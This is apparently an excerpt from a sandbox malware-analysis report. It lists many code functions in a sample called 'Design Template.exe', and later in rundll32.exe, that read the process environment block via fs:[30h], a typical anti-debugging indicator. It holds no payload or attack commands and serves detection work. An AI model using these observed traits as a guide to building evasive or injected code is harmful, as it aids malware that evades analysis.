Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1B02A mov eax, dword ptr fs:[00000030h] 4_2_00A1B02A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3002D mov eax, dword ptr fs:[00000030h] 4_2_00A3002D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h] 4_2_00AD4015
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD4015 mov eax, dword ptr fs:[00000030h] 4_2_00AD4015
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87016 mov eax, dword ptr fs:[00000030h] 4_2_00A87016
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD1074 mov eax, dword ptr fs:[00000030h] 4_2_00AD1074
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC2073 mov eax, dword ptr fs:[00000030h] 4_2_00AC2073
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A20050 mov eax, dword ptr fs:[00000030h] 4_2_00A20050
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A361A0 mov eax, dword ptr fs:[00000030h] 4_2_00A361A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A869A6 mov eax, dword ptr fs:[00000030h] 4_2_00A869A6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A851BE mov eax, dword ptr fs:[00000030h] 4_2_00A851BE
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2C182 mov eax, dword ptr fs:[00000030h] 4_2_00A2C182
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A185 mov eax, dword ptr fs:[00000030h] 4_2_00A3A185
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32990 mov eax, dword ptr fs:[00000030h] 4_2_00A32990
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A941E8 mov eax, dword ptr fs:[00000030h] 4_2_00A941E8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B1E1 mov eax, dword ptr fs:[00000030h] 4_2_00A0B1E1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov eax, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A24120 mov ecx, dword ptr fs:[00000030h] 4_2_00A24120
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3513A mov eax, dword ptr fs:[00000030h] 4_2_00A3513A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09100 mov eax, dword ptr fs:[00000030h] 4_2_00A09100
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C962 mov eax, dword ptr fs:[00000030h] 4_2_00A0C962
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0B171 mov eax, dword ptr fs:[00000030h] 4_2_00A0B171
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2B944 mov eax, dword ptr fs:[00000030h] 4_2_00A2B944
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A052A5 mov eax, dword ptr fs:[00000030h] 4_2_00A052A5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1AAB0 mov eax, dword ptr fs:[00000030h] 4_2_00A1AAB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3FAB0 mov eax, dword ptr fs:[00000030h] 4_2_00A3FAB0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3D294 mov eax, dword ptr fs:[00000030h] 4_2_00A3D294
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32AE4 mov eax, dword ptr fs:[00000030h] 4_2_00A32AE4
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32ACB mov eax, dword ptr fs:[00000030h] 4_2_00A32ACB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A44A2C mov eax, dword ptr fs:[00000030h] 4_2_00A44A2C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A18A0A mov eax, dword ptr fs:[00000030h] 4_2_00A18A0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov eax, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A05210 mov ecx, dword ptr fs:[00000030h] 4_2_00A05210
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0AA16 mov eax, dword ptr fs:[00000030h] 4_2_00A0AA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAA16 mov eax, dword ptr fs:[00000030h] 4_2_00ACAA16
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A23A1C mov eax, dword ptr fs:[00000030h] 4_2_00A23A1C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABB260 mov eax, dword ptr fs:[00000030h] 4_2_00ABB260
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8A62 mov eax, dword ptr fs:[00000030h] 4_2_00AD8A62
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4927A mov eax, dword ptr fs:[00000030h] 4_2_00A4927A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A09240 mov eax, dword ptr fs:[00000030h] 4_2_00A09240
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACEA55 mov eax, dword ptr fs:[00000030h] 4_2_00ACEA55
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A94257 mov eax, dword ptr fs:[00000030h] 4_2_00A94257
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD5BA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD5BA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34BAD mov eax, dword ptr fs:[00000030h] 4_2_00A34BAD
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC138A mov eax, dword ptr fs:[00000030h] 4_2_00AC138A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABD380 mov ecx, dword ptr fs:[00000030h] 4_2_00ABD380
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A11B8F mov eax, dword ptr fs:[00000030h] 4_2_00A11B8F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3B390 mov eax, dword ptr fs:[00000030h] 4_2_00A3B390
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32397 mov eax, dword ptr fs:[00000030h] 4_2_00A32397
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A303E2 mov eax, dword ptr fs:[00000030h] 4_2_00A303E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2DBE9 mov eax, dword ptr fs:[00000030h] 4_2_00A2DBE9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A853CA mov eax, dword ptr fs:[00000030h] 4_2_00A853CA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC131B mov eax, dword ptr fs:[00000030h] 4_2_00AC131B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0DB60 mov ecx, dword ptr fs:[00000030h] 4_2_00A0DB60
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A33B7A mov eax, dword ptr fs:[00000030h] 4_2_00A33B7A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0DB40 mov eax, dword ptr fs:[00000030h] 4_2_00A0DB40
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8B58 mov eax, dword ptr fs:[00000030h] 4_2_00AD8B58
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0F358 mov eax, dword ptr fs:[00000030h] 4_2_00A0F358
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1849B mov eax, dword ptr fs:[00000030h] 4_2_00A1849B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC14FB mov eax, dword ptr fs:[00000030h] 4_2_00AC14FB
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86CF0 mov eax, dword ptr fs:[00000030h] 4_2_00A86CF0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8CD6 mov eax, dword ptr fs:[00000030h] 4_2_00AD8CD6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3BC2C mov eax, dword ptr fs:[00000030h] 4_2_00A3BC2C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD740D mov eax, dword ptr fs:[00000030h] 4_2_00AD740D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86C0A mov eax, dword ptr fs:[00000030h] 4_2_00A86C0A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1C06 mov eax, dword ptr fs:[00000030h] 4_2_00AC1C06
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2746D mov eax, dword ptr fs:[00000030h] 4_2_00A2746D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A44B mov eax, dword ptr fs:[00000030h] 4_2_00A3A44B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9C450 mov eax, dword ptr fs:[00000030h] 4_2_00A9C450
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD05AC mov eax, dword ptr fs:[00000030h] 4_2_00AD05AC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A335A1 mov eax, dword ptr fs:[00000030h] 4_2_00A335A1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A31DB5 mov eax, dword ptr fs:[00000030h] 4_2_00A31DB5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A32581 mov eax, dword ptr fs:[00000030h] 4_2_00A32581
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A02D8A mov eax, dword ptr fs:[00000030h] 4_2_00A02D8A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3FD9B mov eax, dword ptr fs:[00000030h] 4_2_00A3FD9B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1D5E0 mov eax, dword ptr fs:[00000030h] 4_2_00A1D5E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACFDE2 mov eax, dword ptr fs:[00000030h] 4_2_00ACFDE2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AB8DF1 mov eax, dword ptr fs:[00000030h] 4_2_00AB8DF1
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov eax, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A86DC9 mov ecx, dword ptr fs:[00000030h] 4_2_00A86DC9
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0AD30 mov eax, dword ptr fs:[00000030h] 4_2_00A0AD30
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A13D34 mov eax, dword ptr fs:[00000030h] 4_2_00A13D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACE539 mov eax, dword ptr fs:[00000030h] 4_2_00ACE539
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A34D3B mov eax, dword ptr fs:[00000030h] 4_2_00A34D3B
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8D34 mov eax, dword ptr fs:[00000030h] 4_2_00AD8D34
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A8A537 mov eax, dword ptr fs:[00000030h] 4_2_00A8A537
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2C577 mov eax, dword ptr fs:[00000030h] 4_2_00A2C577
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A43D43 mov eax, dword ptr fs:[00000030h] 4_2_00A43D43
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A83540 mov eax, dword ptr fs:[00000030h] 4_2_00A83540
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A27D50 mov eax, dword ptr fs:[00000030h] 4_2_00A27D50
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD0EA5 mov eax, dword ptr fs:[00000030h] 4_2_00AD0EA5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A846A7 mov eax, dword ptr fs:[00000030h] 4_2_00A846A7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9FE87 mov eax, dword ptr fs:[00000030h] 4_2_00A9FE87
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A316E0 mov ecx, dword ptr fs:[00000030h] 4_2_00A316E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A176E2 mov eax, dword ptr fs:[00000030h] 4_2_00A176E2
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A48EC7 mov eax, dword ptr fs:[00000030h] 4_2_00A48EC7
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABFEC0 mov eax, dword ptr fs:[00000030h] 4_2_00ABFEC0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A336CC mov eax, dword ptr fs:[00000030h] 4_2_00A336CC
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8ED6 mov eax, dword ptr fs:[00000030h] 4_2_00AD8ED6
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0E620 mov eax, dword ptr fs:[00000030h] 4_2_00A0E620
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ABFE3F mov eax, dword ptr fs:[00000030h] 4_2_00ABFE3F
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A0C600 mov eax, dword ptr fs:[00000030h] 4_2_00A0C600
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A38E00 mov eax, dword ptr fs:[00000030h] 4_2_00A38E00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AC1608 mov eax, dword ptr fs:[00000030h] 4_2_00AC1608
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A61C mov eax, dword ptr fs:[00000030h] 4_2_00A3A61C
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1766D mov eax, dword ptr fs:[00000030h] 4_2_00A1766D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2AE73 mov eax, dword ptr fs:[00000030h] 4_2_00A2AE73
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A17E41 mov eax, dword ptr fs:[00000030h] 4_2_00A17E41
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00ACAE44 mov eax, dword ptr fs:[00000030h] 4_2_00ACAE44
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A18794 mov eax, dword ptr fs:[00000030h] 4_2_00A18794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A87794 mov eax, dword ptr fs:[00000030h] 4_2_00A87794
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A437F5 mov eax, dword ptr fs:[00000030h] 4_2_00A437F5
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A04F2E mov eax, dword ptr fs:[00000030h] 4_2_00A04F2E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3E730 mov eax, dword ptr fs:[00000030h] 4_2_00A3E730
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD070D mov eax, dword ptr fs:[00000030h] 4_2_00AD070D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A3A70E mov eax, dword ptr fs:[00000030h] 4_2_00A3A70E
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A2F716 mov eax, dword ptr fs:[00000030h] 4_2_00A2F716
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 4_2_00A9FF10
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1FF60 mov eax, dword ptr fs:[00000030h] 4_2_00A1FF60
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00AD8F6A mov eax, dword ptr fs:[00000030h] 4_2_00AD8F6A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A1EF40 mov eax, dword ptr fs:[00000030h] 4_2_00A1EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA44B mov eax, dword ptr fs:[00000030h] 14_2_044BA44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0451C450 mov eax, dword ptr fs:[00000030h] 14_2_0451C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A746D mov eax, dword ptr fs:[00000030h] 14_2_044A746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541C06 mov eax, dword ptr fs:[00000030h] 14_2_04541C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0455740D mov eax, dword ptr fs:[00000030h] 14_2_0455740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506C0A mov eax, dword ptr fs:[00000030h] 14_2_04506C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BBC2C mov eax, dword ptr fs:[00000030h] 14_2_044BBC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558CD6 mov eax, dword ptr fs:[00000030h] 14_2_04558CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506CF0 mov eax, dword ptr fs:[00000030h] 14_2_04506CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045414FB mov eax, dword ptr fs:[00000030h] 14_2_045414FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449849B mov eax, dword ptr fs:[00000030h] 14_2_0449849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044C3D43 mov eax, dword ptr fs:[00000030h] 14_2_044C3D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04503540 mov eax, dword ptr fs:[00000030h] 14_2_04503540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044A7D50 mov eax, dword ptr fs:[00000030h] 14_2_044A7D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h] 14_2_044AC577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AC577 mov eax, dword ptr fs:[00000030h] 14_2_044AC577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04558D34 mov eax, dword ptr fs:[00000030h] 14_2_04558D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0450A537 mov eax, dword ptr fs:[00000030h] 14_2_0450A537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454E539 mov eax, dword ptr fs:[00000030h] 14_2_0454E539
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B4D3B mov eax, dword ptr fs:[00000030h] 14_2_044B4D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448AD30 mov eax, dword ptr fs:[00000030h] 14_2_0448AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04493D34 mov eax, dword ptr fs:[00000030h] 14_2_04493D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov ecx, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04506DC9 mov eax, dword ptr fs:[00000030h] 14_2_04506DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04538DF1 mov eax, dword ptr fs:[00000030h] 14_2_04538DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0449D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0454FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04482D8A mov eax, dword ptr fs:[00000030h] 14_2_04482D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B2581 mov eax, dword ptr fs:[00000030h] 14_2_044B2581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h] 14_2_044BFD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BFD9B mov eax, dword ptr fs:[00000030h] 14_2_044BFD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B35A1 mov eax, dword ptr fs:[00000030h] 14_2_044B35A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045505AC mov eax, dword ptr fs:[00000030h] 14_2_045505AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_045505AC mov eax, dword ptr fs:[00000030h] 14_2_045505AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B1DB5 mov eax, dword ptr fs:[00000030h] 14_2_044B1DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04497E41 mov eax, dword ptr fs:[00000030h] 14_2_04497E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h] 14_2_0454AE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0454AE44 mov eax, dword ptr fs:[00000030h] 14_2_0454AE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0449766D mov eax, dword ptr fs:[00000030h] 14_2_0449766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044AAE73 mov eax, dword ptr fs:[00000030h] 14_2_044AAE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448C600 mov eax, dword ptr fs:[00000030h] 14_2_0448C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044B8E00 mov eax, dword ptr fs:[00000030h] 14_2_044B8E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h] 14_2_044BA61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_044BA61C mov eax, dword ptr fs:[00000030h] 14_2_044BA61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04541608 mov eax, dword ptr fs:[00000030h] 14_2_04541608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0448E620 mov eax, dword ptr fs:[00000030h] 14_2_0448E620
